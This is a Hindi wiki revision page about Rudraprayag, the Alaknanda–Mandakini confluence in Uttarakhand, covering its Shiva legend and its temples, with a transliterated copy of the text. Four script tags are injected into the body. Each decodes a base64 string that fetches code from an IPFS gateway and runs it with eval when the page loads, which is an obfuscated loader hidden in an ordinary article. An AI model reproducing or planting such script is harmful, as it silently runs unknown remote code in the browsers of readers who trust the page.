Difference between revisions of "रुद्रप्रयाग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[चित्र:Rudraprayag.jpg|thumb|250px|[[अलकनंदा नदी|अलकनंदा]] और [[मंदाकिनी नदी|मंदाकिनी]] का संगम, रुद्रप्रयाग, [[उत्तराखंड]]]]
+
[[चित्र:Rudraprayag-1.jpg|thumb|250px|रुद्रप्रयाग, [[उत्तराखंड]]]]
 
'''रुद्रप्रयाग''' [[उत्तराखंड]] राज्य में [[अलकनंदा नदी|अलकनंदा]] और [[मंदाकिनी नदी]] पर स्थित [[पंचप्रयाग]] में से एक है।  
 
'''रुद्रप्रयाग''' [[उत्तराखंड]] राज्य में [[अलकनंदा नदी|अलकनंदा]] और [[मंदाकिनी नदी]] पर स्थित [[पंचप्रयाग]] में से एक है।  
 
*मंदाकिनी और अलखनंदा नदियों का संगम अपने आप में एक अनोखी ख़ूबसूरती है।  
 
*मंदाकिनी और अलखनंदा नदियों का संगम अपने आप में एक अनोखी ख़ूबसूरती है।  
 
*ऐसा माना जाता है कि यहाँ [[नारद मुनि]] ने [[शिव|भगवान शिव]] की उपासना की थी और नारद जी को आर्शीवाद देने के लिए ही भगवान शिव ने रौद्र रूप में अवतार लिया था।  
 
*ऐसा माना जाता है कि यहाँ [[नारद मुनि]] ने [[शिव|भगवान शिव]] की उपासना की थी और नारद जी को आर्शीवाद देने के लिए ही भगवान शिव ने रौद्र रूप में अवतार लिया था।  
 
*यहाँ स्थित शिव और जगदम्‍बा मंदिर प्रमुख धार्मिक स्‍थानों में से है।   
 
*यहाँ स्थित शिव और जगदम्‍बा मंदिर प्रमुख धार्मिक स्‍थानों में से है।   
 +
[[चित्र:Rudraprayag.jpg|thumb|200px|[[अलकनंदा नदी|अलकनंदा]] और [[मंदाकिनी नदी|मंदाकिनी]] का संगम, रुद्रप्रयाग, [[उत्तराखंड]]|left]]
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 09:33, 31 August 2016

[[chitr:Rudraprayag-1.jpg|thumb|250px|rudraprayag, uttarakhand]] rudraprayag uttarakhand rajy mean alakananda aur mandakini nadi par sthit panchaprayag mean se ek hai.

  • mandakini aur alakhananda nadiyoan ka sangam apane ap mean ek anokhi khoobasoorati hai.
  • aisa mana jata hai ki yahaan narad muni ne bhagavan shiv ki upasana ki thi aur narad ji ko arshivad dene ke lie hi bhagavan shiv ne raudr roop mean avatar liya tha.
  • yahaan sthit shiv aur jagadamh‍ba mandir pramukh dharmik sh‍thanoan mean se hai.

[[chitr:Rudraprayag.jpg|thumb|200px|alakananda aur mandakini ka sangam, rudraprayag, uttarakhand|left]]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>